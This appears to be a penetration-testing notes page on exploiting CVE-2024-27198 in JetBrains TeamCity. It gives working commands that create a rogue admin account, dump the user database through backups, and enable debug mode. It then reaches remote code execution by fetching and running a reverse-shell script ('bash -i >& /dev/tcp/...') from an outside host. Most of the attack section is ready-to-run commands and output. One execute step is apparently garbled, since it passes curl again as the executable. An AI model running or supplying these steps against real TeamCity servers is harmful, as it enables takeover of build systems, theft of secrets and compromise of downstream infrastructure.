TeamCity

TeamCity is a web-based Continuous Integration and Continuous Deployment (CI/CD) platform developed by JetBrains. It is commonly used in software development pipelines to automate code testing, building, and deployment. The application exposes a web interface that allows developers and DevOps teams to configure build processes, monitor execution, manage user permissions, and integrate with version control systems such as Git, Mercurial, and Subversion. It supports custom build steps, agent-based job execution, and plugin extensions, making it highly flexible but also potentially risky when exposed to the internet. Since it often manages access tokens, deployment secrets, and code execution contexts, any compromise of a TeamCity instance can result in full control over source code repositories, build artifacts, and downstream infrastructure.

Authentication Bypass

JetBrains TeamCity instances prior to version 2023.11.4 are affected by an an authentication bypass vulnerability (CVE-2024-27198) which allows unauthenticated attackers to perform administrative actions.

This flaw arises from improper access control checks in the web interface, permitting crafted requests to interact with admin-level endpoints without valid credentials. Exploiting this vulnerability provides full administrative access to the TeamCity server, which can include reading or modifying project configurations, injecting malicious build steps, accessing build logs and secrets, or triggering arbitrary code execution via the build agents.

A working PoC which creates an admin account is available:

python3 CVE-2024-27198.py -t http://tc-instance -u x7331 -p Password123!

Access to the UI is then granted and the application's database can be dumped as follows:

1. Administration → Backup

2. Start backup with All except build artifacts scope

3. Download the resulting ZIP file and $ cat database_dump/users

RCE

Several PoCs, such as this and this, leverage the above vulnerability to achieve RCE. For this to be successful the debug mode must be enabled on the server (as explained here). To enable this, we need to first create an admin user; this can be done with any of the PoCs mentioned.

# Create an admin user
$ uv run exploit.py -u http://tc-instance --add-user
[+] User created successfully. Username: xbxb4t78, ID: 22, Password: mEwy3Dn5Ic
[+] Token created successfully for user ID: 22. Token Name: dWzcfCVd61, Token: ey...Fj

# If already exists delete it and get it after
$ curl -X DELETE http://tc-instance/app/rest/users/id:22/tokens/RPC2

# Save the token
$ export TOKEN="ey...Fj"

# Enable the debug mode
$ curl -X POST 'http://tc-instance/admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true' -H "Authorization: Bearer $TOKEN"

# Refresh the server
$ curl 'http://tc-instance/admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties' -H "Authorization: Bearer $TOKEN"

RCE can be now achieved manually or by using the PoCs:

Manual

# Check if curl is installed
$ curl -X POST 'http://tc-instance/app/rest/debug/processes?exePath=which&params=curl' -H "Authorization: Bearer $TOKEN"

# revshell.sh → bash -i >& /dev/tcp/192.168.45.170/80 0>&1

# Download the file
$ curl -X POST 'http://tc-instance/app/rest/debug/processes?exePath=curl&params=192.168.45.170:443/revshell.sh&params=-o&params=revshell.sh' -H "Authorization: Bearer $TOKEN"

# Execute the file
$ curl -X POST 'http://tc-instance/app/rest/debug/processes?exePath=curl&params=192.168.45.170:443/revshell.sh&params=bash&params=revshell.sh' -H "Authorization: Bearer $TOKEN"

PoCs